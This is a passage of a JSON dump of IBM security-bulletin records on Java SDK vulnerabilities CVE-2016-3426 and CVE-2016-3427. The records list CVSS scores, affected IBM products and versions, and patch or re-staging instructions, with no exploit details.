{"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T12:16:04", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T12:16:04", "id": "07DBE9517A4611E5419E1606D2F71A8201613E4042A34EE495FE116635651800", "href": "https://www.ibm.com/support/pages/node/282285", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T14:37:34", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae SDK Java Technology Edition, Version 1.6 and 1.7 that are used by IBM Jazz Team Server affecting the following IBM Jazz Team Server based Applications: Collaborative Lifecycle Management (CLM), Rational Requirements Composer (RRC), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM), and Rational Software Architect (RSA DM). These issues were disclosed as part of the IBM Java SDK updates in April 2016. \n\n## Vulnerability Details\n\nIBM Jazz Team Server and the CLM applications (RRC, RTC, RQM, RDNG), RELM, Rhapsody DM, and RSA DM applications are affected by the following vulnerabilities disclosed in and corrected by the IBM\u00ae Java SDK updates in April 2016 : \n \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 3.0.1 - 6.0.2 \n \nRational Quality Manager 2.0 - 2.0.1 \nRational Quality Manager 3.0 - 3.0.1.6 \nRational Quality Manager 4.0 - 4.0.7 \nRational Quality Manager 5.0 - 5.0.2 \nRational Quality Manager 6.0 - 6.0.2 \n \nRational Team Concert 2.0 - 2.0.0.2 \nRational Team Concert 3.0 - 3.0.6 \nRational Team Concert 4.0 - 4.0.7 \nRational Team Concert 5.0 - 5.0.2 \nRational Team Concert 6.0 - 6.0.2 \n \nRational Requirements Composer 2.0 - 2.0.0.4 \nRational Requirements Composer 3.0 - 3.0.1.6 \nRational Requirements Composer 4.0 - 4.0.7 \n \nRational DOORS Next Generation 4.0 - 4.0.7 \nRational DOORS Next Generation 5.0 - 5.0.2 \nRational DOORS Next Generation 6.0 - 6.0.2 \n \nRational Engineering Lifecycle Manager 1.0- 1.0.0.1 \nRational Engineering Lifecycle Manager 4.0.3 - 4.0.7 \nRational Engineering Lifecycle Manager 5.0 - 5.0.2 \nRational Engineering Lifecycle Manager 6.0 - 6.0.2 \n \nRational Rhapsody Design Manager 3.0 - 3.0.1 \nRational Rhapsody Design Manager 4.0 - 4.0.7 \nRational Rhapsody Design Manager 5.0 - 5.0.2 \nRational Rhapsody Design Manager 6.0 - 6.0.2 \n \nRational Software Architect Design Manager 3.0 - 3.0.1 \nRational Software Architect Design Manager 4.0 - 4.0.7 \nRational Software Architect Design Manager 5.0 - 5.0.2 \nRational Software Architect Design Manager 6.0 - 6.0.2\n\n## Remediation/Fixes\n\nIf your product is deployed on WebSphere Application Server (WAS) and your deployment does not use an Eclipse based client nor the RM Browser plugin, then it is sufficient to continue using the existing version of the your Rational product, and only upgrade the JRE in the WAS server according to these instructions: \n[_ __Security Bulletin: __Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www.ibm.com/support/docview.wss?uid=swg21982223>) \n \n**Otherwise:** \n_Note: for any of the below remediations, if you are a WAS deployment, then WAS must also be upgraded, in addition to performing your product upgrades._ \nUpgrade your products to version **3.0.1.6 or 4.0.7** or **5.0.2** or **6.0.2**, apply the latest ifix, and then perform the following upgrades. Request the April 2016 CPU update for the IBM_\u00ae_ Java SDK: \n \n[_How to update the IBM SDK for Java of IBM Rational products based on version 3.0.1.6 or later of IBM's Jazz technology_](<http://www.ibm.com/support/docview.wss?uid=swg21674139>)\n\n * * For the 3.x releases of Rational Software Architect Design Manager and Rhapsody Design Manager, if you cannot upgrade to 4.0.7 or 5.0 or 6.0, contact [IBM Support](<http://www.ibm.com/software/support/einfo.html>) for guidance.\n * For the 2.x releases, contact [IBM Support](<http://www.ibm.com/software/support/einfo.html>) for additional details on the fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM\u00ae Java SDK affects multiple IBM Rational products based on IBM Jazz technology (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2021-04-28T18:35:50", "id": "0D0755F0269505405CB64BD65BD409DF7890B56244501D37813BE723F406D6C1", "href": "https://www.ibm.com/support/pages/node/279971", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:51:47", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition, Versions 6 and 7 that are used by IBM InfoSphere Information Server. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3 and 11.5\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server| 11.5| JR55811| \\--Follow instructions in the [_README_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is115_JR55811_ISF_services_engine_*>) \nInfoSphere Information Server| 11.3| JR55811| \\--Follow instructions in the [_README_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_JR55811_ISF_services_engine_*>) \nInfoSphere Information Server| 9.1| JR55811| \\--Apply [_JR55811_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is91_JR55811_ISF_services_engine*>) on all tiers \nInfoSphere Information Server| 8.7| JR55811| \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply [_JR55811_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_JR55811_ISF_services_engine*>) on all tiers \nInfoSphere Information Server| 8.5| JR55811| \\--Apply IBM InfoSphere Information Server version [_8.5 Fix Pack 3_](<http://www-01.ibm.com/support/docview.wss?uid=swg24033513>) \n\\--Apply [_JR55811_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8503_JR55811_ISF_services_engine*>) on all tiers \n \nFor IBM InfoSphere Information Server version 8.1, IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T14:08:19", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server (CVE-2016-3426 CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-16T14:08:19", "id": "ACF0F1F92955D253FE8D9A17FABBDE19665D165C1026886A0612F8B6186AA5A2", "href": "https://www.ibm.com/support/pages/node/283951", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:16", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of Liberty for Java for IBM Bluemix. \n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but Liberty for Java for IBM Bluemix is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to Liberty for Java for IBM Bluemix. ** \nCVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n** \nCVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n\n## Affected Products and Versions\n\nThis vulnerability affects all versions of Liberty for Java in IBM Bluemix up to and including v2.7.\n\n## Remediation/Fixes\n\nTo upgrade to Liberty for Java v2.8-20160430-1011 or higher, you must re-stage or re-push your application. To check which version of the Liberty for Java runtime your Bluemix application is using, navigate to the \"Files\" menu item for your application through the Bluemix UI. In the \"logs\" directory, check the \"staging_task.log\". \n \nYou can also find this file through the command-line Cloud Foundry client by running the following command: \n \n**cf files &lt;appname&gt; logs/staging_task.log** \n \nYou can see \n \n\\-----&gt; Liberty Buildpack Version: _________ \n \nTo re-stage your application using the command-line Cloud Foundry client, use the following command: \n \n**cf restage &lt;appname&gt;** \n \nTo re-push your application using the command-line Cloud Foundry client, use the following command: \n \n**cf push &lt;appname&gt;**\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:36", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect Liberty for Java for IBM Bluemix April 2016 CPU (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:36", "id": "4D0056EC4D5672FF48E356CFCC82780C64C9FB240D745F2F627F178D9CF22F0C", "href": "https://www.ibm.com/support/pages/node/278617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:15", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Versions 6 and 7 that are used by WebSphere eXtreme Scale. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nWebSphere eXtreme Scale 7.1.0 \n\nWebSphere eXtreme Scale 7.1.1\n\nWebSphere eXtreme Scale 8.5\n\nWebSphere eXtreme Scale 8.6\n\n## Remediation/Fixes\n\nSince MD5 signatures are no longer compatible with Java, installing this interim fix will make it incompatible with any WebSphere eXtreme Scale clients and servers that are running with an MD5 certificate. If any WebSphere eXtreme Scale clients or servers are configured with a certificate with an MD5 signature, they must be replaced prior to starting after upgrading to this interim fix. Failing to do so will result in the clients and servers failing to connect to each other. Note that client truststores must be configured to trust the new certificate. \n \n\n\n_&lt;Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_WebSphere eXtreme Scale_| 7.1| PI62225 | Refer to the **Version 7.1** table in the [Recommended Fixes page for WebSphere eXtreme Scale](<http://www-01.ibm.com/support/docview.wss?uid=swg27018991>). \n_WebSphere eXtreme Scale_| 7.1.1 \n\n8.5\n\n8.6\n\n| PI62255 | Refer to the **Version 7.1.1**, **8.5**, or **8.6** table in the [Recommended Fixes page for WebSphere eXtreme Scale](<http://www-01.ibm.com/support/docview.wss?uid=swg27018991>). \n \n## Workarounds and Mitigations\n\nNo workaround exists. If you are running WebSphere eXtreme Scale standalone, apply the appropriate fix from the previous table. If you are running WebSphere eXtreme Scale clients or servers that are embedded in WebSphere Application Server, apply the appropriate fix for WebSphere Application Server, which is described here: **_<https://www-304.ibm.com/support/docview.wss?uid=swg21962931>_**\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere eXtreme Scale (CVE-2016-3427, CVE-2016-3426)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "3685A36D136086CBDF1C072E6BE9AD83DCB1C185CE82F5183E3DE098D0CF7921", "href": "https://www.ibm.com/support/pages/node/278783", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T23:34:48", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Service Registry and Repository. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [WebSphere Application Server](<http://www.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrinciple Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nWebSphere Service Registry and Repository V8.5| WebSphere Application Server Network Deployment V8.5.5 \nWebSphere Service Registry and Repository V8.0| WebSphere Application Server Network Deployment V8.0 \nWebSphere Service Registry and Repository V7.5| WebSphere Application Server Network Deployment V7.0 \nWebSphere Service Registry and Repository V7.0| WebSphere Application Server Network Deployment V7.0 \n \n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n## Important Note\n\nIBM strongly suggests that all System z customers be subscribed to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [System z Security web site](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 June 2016: Original version published \n\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Internal Use Only\n\nTHIS DOCUMENT IS FOR PSIRT PRODUCT RECORD #75913\n\n[{\"Product\":{\"code\":\"SSWLGF\",\"label\":\"WebSphere Service Registry and Repository\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"8.5;8.0;7.5;7.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2018-06-15T07:05:52", "type": "ibm", "title": "Multiple vulnerabilities have been identified in WebSphere Application Server shipped with WebSphere Service Registry and Repository (CVE-2016-3426, CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-15T07:05:52", "id": "435516AF6D5C3AA4A41E050752C520D87248D73515C5F8742AB46F7FEAE2E9A4", "href": "https://www.ibm.com/support/pages/node/281871", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:45:02", "description": "## Summary\n\nOracle released the April 2016 critical patch updates which contain multiple fixes for security vulnerabilities in the IBM Java Development Kit that is included with the IBM WebSphere Application Server.\n\n## Vulnerability Details\n\nNew IBM WebSphere Application Server updates are available that include an updated IBM Java Virtual Machine to solve several security vulnerabilities. IBM Java Virtual Machine has been updated to incorporate those updates. \n \nFor information about how to download and install the IBM WebSphere Application Server April 2016 critical patch updates, see the IBM WebSphere Application Server Security Bulletin at the following link: \n[Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21982223>)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Integrated Information Core V1.5, V1.5.0.1 and V1.5.0.2| IBM WebSphere Application Server V7.0 \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T22:28:33", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Integrated Information Core - Oracle CPU April 2016", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:28:33", "id": "2F849754C32CC7E1EC23ADD90E35A80C3A3A4B7890DAD95ADA048C88D062115A", "href": "https://www.ibm.com/support/pages/node/279869", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:43", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae SDK Java\u2122 Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed in the Oracle April 2016 Critical Patch Update, plus four additional vulnerabilities. These may affect some configurations of IBM WebSphere Application Server Full Profile, IBM WebSphere Application Server Liberty Profile, and IBM WebSphere Application Server Hypervisor Edition\n\n## Vulnerability Details\n\nThis bulletin covers all applicable Java SE CVEs published by Oracle as part of their April 2016 Critical Patch Update which affects IBM SDK, Java Technology Edition. There are other advisories included in the IBM Java SDK but WebSphere Application Server is not vulnerable to them. You will need to evaluate your own code to determine if you are vulnerable. Please refer to the Reference section for more information on the advisories not applicable to WebSphere Application Server. HP fixes are on a delayed schedule. \n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\nPlease consult the security bulletin [_Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) for vulnerability details.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected IBM WebSphere Application Server Version \n---|--- \nTivoli Netcool Performance Manager version 1.3.1, 1.3.2, 1.3.3, 1.4.0, 1.4.1| WAS version: 8.5.0.0 through 8.5.5.9, Version 8.0.0.0 through 8.0.0.12, Version 7.0.0.0 through 7.0.0.41. \n\n \n\u00b7 This does not occur on IBM Java SDK shipped with WebSphere Application Servers Fix Packs 8.5.5.10, 8.0.0.13 and 7.0.0.43 or later. \n \n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": 